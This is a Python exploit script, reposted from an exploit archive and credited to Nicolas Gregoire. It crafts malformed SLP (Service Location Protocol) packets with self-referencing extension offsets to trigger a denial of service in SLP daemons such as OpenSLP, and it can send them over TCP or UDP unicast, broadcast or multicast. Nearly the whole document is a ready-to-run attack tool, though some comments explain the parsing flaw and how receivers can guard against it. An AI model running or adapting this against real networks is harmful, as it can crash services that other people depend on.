SLP (Service Location Protocol) Denial Of Service
来源:vfocus.net 作者:vfocus 发布时间:2011-07-27  
#!/usr/bin/python

''' ==================================
          Pseudo documentation 
================================== '''

# SLPick, extension DoS release
# by Nicolas Gregoire

''' ==================================
             Imports 
================================== '''

import getopt
import re
import sys
import binascii
import struct
import socket
import os


''' ==================================
        Default values
================================== '''

# Tool version string, shown in the start-up banner.
version = '0.4'
# Transport selected with -m: 'tcp', 'unicast', 'broadcast' or 'multicast'.
mode = 'unicast'
# 'N/A' is the "not set" sentinel that checkArguments() compares against.
source = 'N/A'
target = 'N/A'
# Two-byte SLP transaction id written into the header by createPacket();
# checkArguments() replaces it with zeros in multicast mode.
xid = '\x12\x34'
# 427 is the registered SLP port.
port = 427
# Number of header extensions createPacket() declares:
# 0 gives a well-formed request, 1 and 2 give a malformed extension chain.
nb = 1
# Request body type: 'sr' (service request) or 'ar' (attribute request).
req = 'sr'

''' ==================================
        Standard functions
================================== '''

# Some nice formatting
def zprint(str):
    """Print *str* on stdout behind the '[=] ' status prefix."""
    line = '[=] ' + str
    print line

# Function displaying CLI arguments
def showUsage():
    """Print the command-line help, then terminate with exit status 1.

    The current module-level values of mode and port are shown as the
    defaults. This function never returns.
    """
    usage_lines = (
        'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]',
        '\t[-h] Help (this text)',
        '\t[-m] Mode : tcp / unicast / broadcast / multicast (default is "' + mode + '")',
        '\t[-p] Port : default is "' + str(port) + '"',
        '\t[-s] Source IP Adress : no default (used only in multicast mode)',
        '\t[-t] Target IP Adress : no default (forced in multicast mode)',
        '\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)',
        '\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)',
    )
    for usage_line in usage_lines:
        print usage_line
    sys.exit(1)

# Function parsing parameters
def getArguments():
    """Read the command line and overwrite the module-level settings.

    Recognised switches are -h, -m, -p, -s, -t, -n and -r. An unknown
    switch, or -h, ends in showUsage(), which exits the program.
    The -n value is converted with int(); every other value, the -p port
    included, is stored as the string getopt returned.
    """
    global port, source, target, mode, nb, req

    try:
        parsed, leftover = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:')
    except getopt.GetoptError:
        showUsage()

    for flag, value in parsed:
        if flag == '-h':
            showUsage()
        elif flag == '-p':
            port = value
        elif flag == '-s':
            source = value
        elif flag == '-t':
            target = value
        elif flag == '-m':
            mode = value
        elif flag == '-n':
            nb = int(value)
        elif flag == '-r':
            req = value

# Function checking parameters
def checkArguments():
    """Validate the selected mode and apply the multicast overrides.

    In multicast mode the transaction id is forced to zero, the target is
    forced to the SLP multicast group 239.255.255.253, and a source
    address must have been given with -s. In tcp, unicast and broadcast
    mode a target must have been given with -t. Any other mode is
    rejected. Every failure ends in showUsage(), which exits.
    """
    global xid, target

    if mode == 'multicast':
        # Multicast requests carry XID 0 and go to the SLP group address
        xid = '\x00\x00'
        zprint('Forcing XID to "0"')
        target = '239.255.255.253'
        zprint('Forcing target IP to "' + target + '"')
        # The source address selects the local interface to send from
        if source == 'N/A':
            zprint('You need to force the source address with "-s" !')
            showUsage()
        else:
            zprint('Forcing source IP to "' + source + '"')
        return

    if mode not in ('unicast', 'broadcast', 'tcp'):
        zprint('Invalid mode !')
        showUsage()
    elif target == 'N/A':
        # A destination is mandatory outside multicast mode
        zprint('Invalid target !')
        showUsage()

''' ==================================
        SLP functions
================================== '''

# Define payload of type "Service Request"
def getServRequest():
    """Build the body of an SLP Service Request.

    Returns a (function_id, body) tuple. The function id is '\\x01' and
    the body asks for the service type 'service:directory-agent' with an
    empty previous-responder list, predicate, scope list and SPI.
    Each variable-size field is preceded by its 16-bit big-endian length.
    """
    zprint('Creating payload of type "Service Request"')

    # A zero 16-bit length marks a field as absent
    absent = '\x00\x00'
    service_type = 'service:directory-agent'

    body = ''.join([
        absent,                                   # previous responder list
        struct.pack('!h', len(service_type)),
        service_type,
        absent,                                   # predicate
        absent,                                   # scope list
        absent,                                   # SPI
    ])

    return ('\x01', body)

# Define payload of type "Attribute Request"
def getAttrRequest():
    """Build the body of an SLP Attribute Request.

    Returns a (function_id, body) tuple. The function id is '\\x06' and
    the body names the URL 'http://www.agarri.fr/' in scope 'default',
    with an empty previous-responder list, tag list and SPI.
    Each variable-size field is preceded by its 16-bit big-endian length.
    """
    zprint('Creating payload of type "Attribue Request"')

    # A zero 16-bit length marks a field as absent
    absent = '\x00\x00'
    url = 'http://www.agarri.fr/'
    scope = 'default'

    body = ''.join([
        absent,                                   # previous responder list
        struct.pack('!h', len(url)),
        url,
        struct.pack('!h', len(scope)),
        scope,
        absent,                                   # tag list
        absent,                                   # SPI
    ])

    return ('\x06', body)

# Define the function creating the full SLP packet
def createPacket(function, message):
    """Wrap a request body in an SLP version 2 header.

    function is the one-byte function id and message the request body,
    as returned by getServRequest() / getAttrRequest(). The module-level
    nb selects how the header's 3-byte "next extension offset" is set:

      0  offset 0, no extension: a well-formed request
      1  offset 5, which is the position of the flags field in this very
         header, so the field that follows it is read as an extension's
         own next-offset and leads back to offset 5
      2  offset of a 7-byte extension appended after the body, whose own
         next-offset field points back at itself

    Cases 1 and 2 describe an extension chain that never terminates.
    A receiver is only safe if it rejects offsets that fall outside the
    message or do not move strictly forward, or bounds the number of
    extensions it follows. Any other nb prints an error and exits.

    Returns the complete packet as a byte string.
    """
    zprint('Adding headers and trailers')

    # Protocol version byte (local; the module-level version is the tool's)
    slp_version = '\x02'

    # 0x2000 sets the 'Multicast required' flag
    if mode in ('broadcast', 'multicast'):
        flags = '\x20\x00'
    else:
        flags = '\x00\x00'

    zprint('Using ' + str(nb) + ' extension(s)')
    if nb not in (0, 1, 2):
        print 'Wrong number of extensions'
        sys.exit(1)

    extension = ''
    if nb == 0:
        # No extension: nothing for the receiver to walk
        next_ext_offset = '\x00\x00\x00'
    elif nb == 1:
        # Self-referencing offset inside the fixed header
        next_ext_offset = '\x00\x00\x05'
    else:
        # Hard-coded to the packet length before the trailer for the two
        # built-in request bodies (0x31 for 'sr', 0x36 otherwise)
        if req == 'sr':
            next_ext_offset = '\x00\x00\x31'
        else:
            next_ext_offset = '\x00\x00\x36'
        # Trailer layout: extension id, next offset, data.
        # OpenSLP : extid should be < 0x4000 or > 0x7FFF
        # The trailer's next offset is its own position; the data bytes
        # are arbitrary.
        extension = '\xBA\xBE' + next_ext_offset + '\x22\x22'

    # Language tag, preceded by its 16-bit big-endian length
    lang = 'en'
    headers = flags + next_ext_offset + xid + struct.pack('!h', len(lang)) + lang

    # Length field counts the whole packet: 5 bytes for version, function
    # and the 3-byte length itself (high byte fixed at 0), plus the rest
    total_length = len(headers) + len(message) + len(extension) + 5
    packet = slp_version + function + '\x00' + struct.pack('!h', total_length)
    packet += headers + message + extension

    return packet

''' ==================================
           Send packet via TCP or UDP
================================== '''

# Send via TCP
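def sendTcpPacket(packet):
    """Send *packet* to (target, port) over a TCP connection.

    The connection attempt is limited by a 3 second socket timeout. A
    socket error while connecting prints a message and exits with
    status 1. The socket is closed on every path.
    """
    zprint('Sending packet via TCP [' + target + ']')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        s.connect((target, port))
    except socket.error:
        zprint('Socket error (port closed ?)')
        s.close()
        sys.exit(1)
    try:
        s.send(packet)
    finally:
        # The original wrote "s.close" without parentheses, which only
        # names the method and leaves the socket open.
        s.close()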

# Send via unicast UDP
def sendUnicastPacket(packet):
    """Send *packet* to (target, port) as a single UDP datagram."""
    zprint('Sending packet via Unicast UDP [' + target + ']')
    destination = (target, port)
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(packet, destination)

# Send via broadcast UDP
def sendBroadcastPacket(packet):
    """Send *packet* to (target, port) as one UDP datagram with SO_BROADCAST set."""
    zprint('Sending packet via Broadcast UDP [' + target + ']')
    destination = (target, port)
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # SO_BROADCAST is set so that the OS accepts a broadcast destination
    udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    udp_sock.sendto(packet, destination)

# Send via multicast UDP
def sendMulticastPacket(packet):
    """Send *packet* to (target, port) as one multicast UDP datagram.

    The socket is bound to (source, 6666), which selects the local
    interface, and the multicast TTL is set to 255.
    """
    zprint('Sending packet via Multicast UDP [' + target + ']')
    local_endpoint = (source, 6666)
    destination = (target, port)
    mcast_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    mcast_sock.bind(local_endpoint)
    mcast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
    mcast_sock.sendto(packet, destination)

''' ==================================
           Main code
================================== '''

# Print banner
zprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)')

# Read the command line, then validate it (both may exit through showUsage)
getArguments()
checkArguments()

# Attribute request for 'ar', service request for anything else
build_body = getAttrRequest if req == 'ar' else getServRequest
func, payload = build_body()

# Wrap the body in the SLP header (and any extension)
packet = createPacket(func, payload)

# One sender per transport; checkArguments() has already rejected other modes
senders = {
    'tcp': sendTcpPacket,
    'unicast': sendUnicastPacket,
    'broadcast': sendBroadcastPacket,
    'multicast': sendMulticastPacket,
}
send = senders.get(mode)
if send is not None:
    send(packet)

# Done
zprint('Exit')



 